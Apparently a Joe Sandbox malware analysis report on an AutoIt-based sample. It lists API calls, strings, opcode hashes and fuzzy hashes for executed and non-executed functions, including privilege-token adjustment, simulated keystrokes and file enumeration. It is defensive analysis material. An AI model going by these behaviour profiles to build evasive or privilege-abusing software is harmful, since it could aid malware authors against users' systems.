                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: _memmove
                                          • String ID:
                                          • API String ID: 4104443479-0
                                          • Opcode ID: 537858043f66051b4d359b2b29ec4505123abfafb87f4fc159f336fc7ef05951
                                          • Instruction ID: 18c7a4f1a7e30bdfb87d822feacb7cc9ac9f514966962659d02b497e054a62ce
                                          • Opcode Fuzzy Hash: 537858043f66051b4d359b2b29ec4505123abfafb87f4fc159f336fc7ef05951
                                          • Instruction Fuzzy Hash: F3214872A18A19EBDB108F51F84176DBBB4FF54360F21852DE886C51E0EB30D4D0DB01
                                          Function 00904DDD Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00904BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00904BEF
                                            • Part of subcall function 0092525B: __wfsopen.LIBCMT ref: 00925266
                                          • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,009C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00904E0F
                                            • Part of subcall function 00904B6A: FreeLibrary.KERNEL32(00000000), ref: 00904BA4
                                            • Part of subcall function 00904C70: _memmove.LIBCMT ref: 00904CBA
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Library$Free$Load__wfsopen_memmove
                                          • String ID:
                                          • API String ID: 1396898556-0
                                          • Opcode ID: c4494537dcfdf245409ae5c8001fe27ea858000a291c1b18daf2d2eee2a0578f
                                          • Instruction ID: 21de6837da40b671ed4e9835b80f67b3b64951997047e5278f4c8efdc67444e3
                                          • Opcode Fuzzy Hash: c4494537dcfdf245409ae5c8001fe27ea858000a291c1b18daf2d2eee2a0578f
                                          • Instruction Fuzzy Hash: 1D11E371640205AFCF14BF70D812FAD77A9AFC4B10F108829F746AB1C1DA759A019B90
                                          Function 0093FD85 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: ClearVariant
                                          • String ID:
                                          • API String ID: 1473721057-0
                                          • Opcode ID: bf140a0f402adb2cbc4ef512011abdcb7f339601c10605743bab857599ca3558
                                          • Instruction ID: 3572b10278879f8db3d81e3aa33cb5cc38e72a4ced84f22b9e151354291e8745
                                          • Opcode Fuzzy Hash: bf140a0f402adb2cbc4ef512011abdcb7f339601c10605743bab857599ca3558
                                          • Instruction Fuzzy Hash: 692124B4908311DFDB24DF24C844B1ABBE0BF88314F05896CF98A577A2D731E845CB92
                                          Function 00924863 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                          Download Yara Rule
                                          APIs
                                          • __lock_file.LIBCMT ref: 009248A6
                                            • Part of subcall function 00928B28: __getptd_noexit.LIBCMT ref: 00928B28
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: __getptd_noexit__lock_file
                                          • String ID:
                                          • API String ID: 2597487223-0
                                          • Opcode ID: 693ee37772e2cd1f858a620bcbc7200713eba8cb73b512324075a96e685f10b9
                                          • Instruction ID: e2a1d0e6e9897afd261c49960105bcb20a3a6af73ca317adb007649d9a6ca231
                                          • Opcode Fuzzy Hash: 693ee37772e2cd1f858a620bcbc7200713eba8cb73b512324075a96e685f10b9
                                          • Instruction Fuzzy Hash: DEF02231812228EBDF11AFB0AC063EF36A4AF81324F008404F5209A2C9DB788950DB41
                                          Function 00904E4A Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                          Download Yara Rule
                                          APIs
                                          • FreeLibrary.KERNEL32(?,?,009C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00904E7E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: FreeLibrary
                                          • String ID:
                                          • API String ID: 3664257935-0
                                          • Opcode ID: bd7962e5eb0f3ef2b0ce12b097335437b9bd0a33c0099e2f1d7d88301c829956
                                          • Instruction ID: c07f2cd73c044eaea864b805e769649bee3afd0a5e7e0b28b488809c1b45dd7e
                                          • Opcode Fuzzy Hash: bd7962e5eb0f3ef2b0ce12b097335437b9bd0a33c0099e2f1d7d88301c829956
                                          • Instruction Fuzzy Hash: 70F06DB1505711CFCB349F64E498812BBF5BF543693208E3EE2D786660C732A880DF40
                                          Function 00920791 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 009207B0
                                            • Part of subcall function 00907BCC: _memmove.LIBCMT ref: 00907C06
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: LongNamePath_memmove
                                          • String ID:
                                          • API String ID: 2514874351-0
                                          • Opcode ID: a6ea2a759c6c2c2dcc02e83239e1b024037783949122da56552d45bcc49be7ba
                                          • Instruction ID: 14cfec5cb7a1446fd106aaff301b6e76290f262ab46b380457839a89334c518d
                                          • Opcode Fuzzy Hash: a6ea2a759c6c2c2dcc02e83239e1b024037783949122da56552d45bcc49be7ba
                                          • Instruction Fuzzy Hash: EDE086369041285BC720D6989C05FEAB79DDBC87A0F0541B5FC0CD7254D960AC808690
                                          Function 0092525B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: __wfsopen
                                          • String ID:
                                          • API String ID: 197181222-0
                                          • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                          • Instruction ID: 7dbc614dd8f102a8ada9eeefdbda033d1f7db80fb16d017d2c6de1fb673c19c9
                                          • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                          • Instruction Fuzzy Hash: B9B0927644020CB7CE012A82FC02B593B199B81764F408020FB1C181B2A673A6649A89
                                          Function 012724CC Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON
                                          Download Yara Rule
                                          APIs
                                          • Sleep.KERNELBASE(000001F4), ref: 012724E1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1460293219.0000000001270000.00000040.00000020.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1270000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Sleep
                                          • String ID:
                                          • API String ID: 3472027048-0
                                          • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                          • Instruction ID: 3d072e5e03bea4d9b887be1740be63a2e7316d4785097e5375fab567c9e3087b
                                          • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                          • Instruction Fuzzy Hash: 6FE0BF7494010EEFDB10EFA4D5496DE7BB4EF04301F1045A1FD05D7681DB309E549A62
                                          Function 012724D0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                          Download Yara Rule
                                          APIs
                                          • Sleep.KERNELBASE(000001F4), ref: 012724E1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1460293219.0000000001270000.00000040.00000020.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1270000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Sleep
                                          • String ID:
                                          • API String ID: 3472027048-0
                                          • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                          • Instruction ID: 7d46b4cfd2ece717c4462bd7ea75c481eea8360a413bde1cd11f56245b01502f
                                          • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                          • Instruction Fuzzy Hash: 0BE0E67494010EDFDB00EFB4D54969E7FB4EF04301F104561FD01D2281DA309D509A62

                                          Non-executed Functions

                                          Function 0098CABC Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 632windowkeyboardCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00902612: GetWindowLongW.USER32(?,000000EB), ref: 00902623
                                          • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0098CB37
                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0098CB95
                                          • GetWindowLongW.USER32(?,000000F0), ref: 0098CBD6
                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0098CC00
                                          • SendMessageW.USER32 ref: 0098CC29
                                          • _wcsncpy.LIBCMT ref: 0098CC95
                                          • GetKeyState.USER32(00000011), ref: 0098CCB6
                                          • GetKeyState.USER32(00000009), ref: 0098CCC3
                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0098CCD9
                                          • GetKeyState.USER32(00000010), ref: 0098CCE3
                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0098CD0C
                                          • SendMessageW.USER32 ref: 0098CD33
                                          • SendMessageW.USER32(?,00001030,?,0098B348), ref: 0098CE37
                                          • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0098CE4D
                                          • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0098CE60
                                          • SetCapture.USER32(?), ref: 0098CE69
                                          • ClientToScreen.USER32(?,?), ref: 0098CECE
                                          • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0098CEDB
                                          • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0098CEF5
                                          • ReleaseCapture.USER32 ref: 0098CF00
                                          • GetCursorPos.USER32(?), ref: 0098CF3A
                                          • ScreenToClient.USER32(?,?), ref: 0098CF47
                                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 0098CFA3
                                          • SendMessageW.USER32 ref: 0098CFD1
                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 0098D00E
                                          • SendMessageW.USER32 ref: 0098D03D
                                          • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0098D05E
                                          • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0098D06D
                                          • GetCursorPos.USER32(?), ref: 0098D08D
                                          • ScreenToClient.USER32(?,?), ref: 0098D09A
                                          • GetParent.USER32(?), ref: 0098D0BA
                                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 0098D123
                                          • SendMessageW.USER32 ref: 0098D154
                                          • ClientToScreen.USER32(?,?), ref: 0098D1B2
                                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0098D1E2
                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 0098D20C
                                          • SendMessageW.USER32 ref: 0098D22F
                                          • ClientToScreen.USER32(?,?), ref: 0098D281
                                          • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0098D2B5
                                            • Part of subcall function 009025DB: GetWindowLongW.USER32(?,000000EB), ref: 009025EC
                                          • GetWindowLongW.USER32(?,000000F0), ref: 0098D351
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                          • String ID: @GUI_DRAGID$F
                                          • API String ID: 3977979337-4164748364
                                          • Opcode ID: 7251ac33155cb1a764b17db0aa69c52ec2243566a070f2af3630053b58e062f6
                                          • Instruction ID: e27a87c4e31e8e85d8eaa1fb8dbdb9b52c214627a37d7ddd3540c4b087d3d8f3
                                          • Opcode Fuzzy Hash: 7251ac33155cb1a764b17db0aa69c52ec2243566a070f2af3630053b58e062f6
                                          • Instruction Fuzzy Hash: AD42AFB4618641AFD724EF24D848F6ABBE9FF48314F140A19F599873B1D731E840EB62
                                          Function 00916F9E Relevance: 48.8, APIs: 19, Strings: 6, Instructions: 5018COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: _memmove$_memset
                                          • String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                                          • API String ID: 1357608183-1798697756
                                          • Opcode ID: 12d1bd2bda7d416134d11d0723eaec3b76e3e1007ad1d981cac5a70aadc79497
                                          • Instruction ID: f901e344a0dec507725542041a2961841f263e5fe783aa395139ec72ec89ae85
                                          • Opcode Fuzzy Hash: 12d1bd2bda7d416134d11d0723eaec3b76e3e1007ad1d981cac5a70aadc79497
                                          • Instruction Fuzzy Hash: 3A93B371E0421ADBDB24CFA9C881BEDB7B5FF48311F24856AED45AB280E7749D85CB40
                                          Function 009048D7 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetForegroundWindow.USER32(00000000,?), ref: 009048DF
                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0093D665
                                          • IsIconic.USER32(?), ref: 0093D66E
                                          • ShowWindow.USER32(?,00000009), ref: 0093D67B
                                          • SetForegroundWindow.USER32(?), ref: 0093D685
                                          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0093D69B
                                          • GetCurrentThreadId.KERNEL32 ref: 0093D6A2
                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 0093D6AE
                                          • AttachThreadInput.USER32(?,00000000,00000001), ref: 0093D6BF
                                          • AttachThreadInput.USER32(?,00000000,00000001), ref: 0093D6C7
                                          • AttachThreadInput.USER32(00000000,?,00000001), ref: 0093D6CF
                                          • SetForegroundWindow.USER32(?), ref: 0093D6D2
                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0093D6E7
                                          • keybd_event.USER32(00000012,00000000), ref: 0093D6F2
                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0093D6FC
                                          • keybd_event.USER32(00000012,00000000), ref: 0093D701
                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0093D70A
                                          • keybd_event.USER32(00000012,00000000), ref: 0093D70F
                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0093D719
                                          • keybd_event.USER32(00000012,00000000), ref: 0093D71E
                                          • SetForegroundWindow.USER32(?), ref: 0093D721
                                          • AttachThreadInput.USER32(?,?,00000000), ref: 0093D748
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                          • String ID: Shell_TrayWnd
                                          • API String ID: 4125248594-2988720461
                                          • Opcode ID: 1142becbf1fcfa0616faeb4a15a0906f5b4083651b6e3986e9c34700111a088d
                                          • Instruction ID: 2f323559c9498fac459ff834ea04fba9114b2985797be5d6e654b42b0b697c45
                                          • Opcode Fuzzy Hash: 1142becbf1fcfa0616faeb4a15a0906f5b4083651b6e3986e9c34700111a088d
                                          • Instruction Fuzzy Hash: ED319271A50318BAEB202B619C5AF7F3E6CEB44B50F104025FA05EA2D1D6B05D10BFA0
                                          Function 00958310 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 009587E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0095882B
                                            • Part of subcall function 009587E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00958858
                                            • Part of subcall function 009587E1: GetLastError.KERNEL32 ref: 00958865
                                          • _memset.LIBCMT ref: 00958353
                                          • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 009583A5
                                          • CloseHandle.KERNEL32(?), ref: 009583B6
                                          • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 009583CD
                                          • GetProcessWindowStation.USER32 ref: 009583E6
                                          • SetProcessWindowStation.USER32(00000000), ref: 009583F0
                                          • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0095840A
                                            • Part of subcall function 009581CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00958309), ref: 009581E0
                                            • Part of subcall function 009581CB: CloseHandle.KERNEL32(?,?,00958309), ref: 009581F2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                          • String ID: $default$winsta0
                                          • API String ID: 2063423040-1027155976
                                          • Opcode ID: 16e71f4b981f703900abc07283ba234ca5538263ce5df1136b87f84ef72e0069
                                          • Instruction ID: f5dbc7ea94ea43d9c875b6e34d3344c38a138bdb2e6c37e1f37673e34aa0f813
                                          • Opcode Fuzzy Hash: 16e71f4b981f703900abc07283ba234ca5538263ce5df1136b87f84ef72e0069
                                          • Instruction Fuzzy Hash: 228148B1904209AFDF11DFA5DC45AEFBBB8EF08305F1441A9FD14B6261EB318A19DB20
                                          Function 0096C75C Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • FindFirstFileW.KERNEL32(?,?), ref: 0096C78D
                                          • FindClose.KERNEL32(00000000), ref: 0096C7E1
                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0096C806
                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0096C81D
                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 0096C844
                                          • __swprintf.LIBCMT ref: 0096C890
                                          • __swprintf.LIBCMT ref: 0096C8D3
                                            • Part of subcall function 00907DE1: _memmove.LIBCMT ref: 00907E22
                                          • __swprintf.LIBCMT ref: 0096C927
                                            • Part of subcall function 00923698: __woutput_l.LIBCMT ref: 009236F1
                                          • __swprintf.LIBCMT ref: 0096C975
                                            • Part of subcall function 00923698: __flsbuf.LIBCMT ref: 00923713
                                            • Part of subcall function 00923698: __flsbuf.LIBCMT ref: 0092372B
                                          • __swprintf.LIBCMT ref: 0096C9C4
                                          • __swprintf.LIBCMT ref: 0096CA13
                                          • __swprintf.LIBCMT ref: 0096CA62
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                          • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                          • API String ID: 3953360268-2428617273
                                          • Opcode ID: ecf9060ae3c84c6c2d6f755996b5f9b5f5f20b6b64c6108eb310228c5f6dba73
                                          • Instruction ID: f35fc0548e5c343573b155c3ede5040dea1b9c9c35b01f79dd9922e23e60f9fe
                                          • Opcode Fuzzy Hash: ecf9060ae3c84c6c2d6f755996b5f9b5f5f20b6b64c6108eb310228c5f6dba73
                                          • Instruction Fuzzy Hash: 12A1FFB1508244AFC710EF94D886EAFB7ECEFD4704F40491AF59586292EA34DA08CB62
                                          Function 0096EF95 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 0096EFB6
                                          • _wcscmp.LIBCMT ref: 0096EFCB
                                          • _wcscmp.LIBCMT ref: 0096EFE2
                                          • GetFileAttributesW.KERNEL32(?), ref: 0096EFF4
                                          • SetFileAttributesW.KERNEL32(?,?), ref: 0096F00E
                                          • FindNextFileW.KERNEL32(00000000,?), ref: 0096F026
                                          • FindClose.KERNEL32(00000000), ref: 0096F031
                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 0096F04D
                                          • _wcscmp.LIBCMT ref: 0096F074
                                          • _wcscmp.LIBCMT ref: 0096F08B
                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0096F09D
                                          • SetCurrentDirectoryW.KERNEL32(009B8920), ref: 0096F0BB
                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 0096F0C5
                                          • FindClose.KERNEL32(00000000), ref: 0096F0D2
                                          • FindClose.KERNEL32(00000000), ref: 0096F0E4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                          • String ID: *.*
                                          • API String ID: 1803514871-438819550
